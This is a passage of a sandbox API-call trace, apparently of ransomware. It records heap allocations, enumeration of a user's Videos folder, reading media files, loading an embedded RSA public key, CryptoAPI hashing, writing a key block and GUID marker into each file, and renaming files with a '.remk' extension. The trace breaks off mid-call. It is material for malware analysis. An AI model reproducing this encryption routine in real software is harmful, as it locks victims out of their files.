(HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0237.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0237.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0237.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0237.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.914] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\") returned="S Vy53\\" [0237.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0237.914] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\") returned="ZCC-nq6c5y\\" [0237.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.914] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\") returned="CSFg h-wcbKcac\\" [0237.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.914] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\") returned="PCPKs0u\\" [0237.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0237.915] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0237.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf570 [0237.915] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0237.915] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.915] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.915] PathFindFileNameW (pszPath="") returned="" [0237.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185fa8 [0237.915] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98cf75b0, ftCreationTime.dwHighDateTime=0x1d5dd76, ftLastAccessTime.dwLowDateTime=0x8913cb00, ftLastAccessTime.dwHighDateTime=0x1d5deaa, ftLastWriteTime.dwLowDateTime=0x8913cb00, ftLastWriteTime.dwHighDateTime=0x1d5deaa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0237.917] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98cf75b0, ftCreationTime.dwHighDateTime=0x1d5dd76, ftLastAccessTime.dwLowDateTime=0x8913cb00, ftLastAccessTime.dwHighDateTime=0x1d5deaa, ftLastWriteTime.dwLowDateTime=0x8913cb00, ftLastWriteTime.dwHighDateTime=0x1d5deaa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.917] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd91f1ea0, ftCreationTime.dwHighDateTime=0x1d5e3ec, ftLastAccessTime.dwLowDateTime=0x53a15700, ftLastAccessTime.dwHighDateTime=0x1d5e047, ftLastWriteTime.dwLowDateTime=0x53a15700, ftLastWriteTime.dwHighDateTime=0x1d5e047, nFileSizeHigh=0x0, nFileSizeLow=0x1720e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f8B4p09.swf", cAlternateFileName="")) returned 1 [0237.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x3192918 [0237.917] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\f8B4p09.swf") returned=".swf" [0237.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\f8B4p09.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\s vy53\\f8b4p09.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.919] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=94734) returned 1 [0237.919] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.921] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x171e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.921] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.923] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x1720e, lpOverlapped=0x0) returned 1 [0237.924] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0237.924] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.924] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.924] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.925] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.925] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.926] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0237.926] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.926] GetLastError () returned 0x0 [0237.926] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.926] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.926] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.926] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.926] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.927] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.927] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1720e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.927] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.927] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.927] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.928] CloseHandle (hObject=0x640) returned 1 [0237.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0237.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x37bd408 [0237.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c78d8 | out: hHeap=0x630000) returned 1 [0237.931] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\f8B4p09.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\s vy53\\f8b4p09.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\f8B4p09.swf.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\s vy53\\f8b4p09.swf.remk")) returned 1 [0237.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.934] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.934] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.935] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ce9e920, ftCreationTime.dwHighDateTime=0x1d5e6d5, ftLastAccessTime.dwLowDateTime=0x7df995c0, ftLastAccessTime.dwHighDateTime=0x1d5deea, ftLastWriteTime.dwLowDateTime=0x7df995c0, ftLastWriteTime.dwHighDateTime=0x1d5deea, nFileSizeHigh=0x0, nFileSizeLow=0x8bb5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iCzLPFif.flv", cAlternateFileName="")) returned 1 [0237.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.935] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x3192918 [0237.935] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.935] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\iCzLPFif.flv") returned=".flv" [0237.935] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\ZCC-nq6c5y\\S Vy53\\iCzLPFif.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\zcc-nq6c5y\\s vy53\\iczlpfif.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.936] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=35765) returned 1 [0237.936] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.939] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8b8f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.939] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.941] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.941] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x8bb5, lpOverlapped=0x0) returned 1 [0237.942] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.942] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0237.942] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.942] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.942] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.944] CryptCreateHash (in: hProv=0x694fd0, 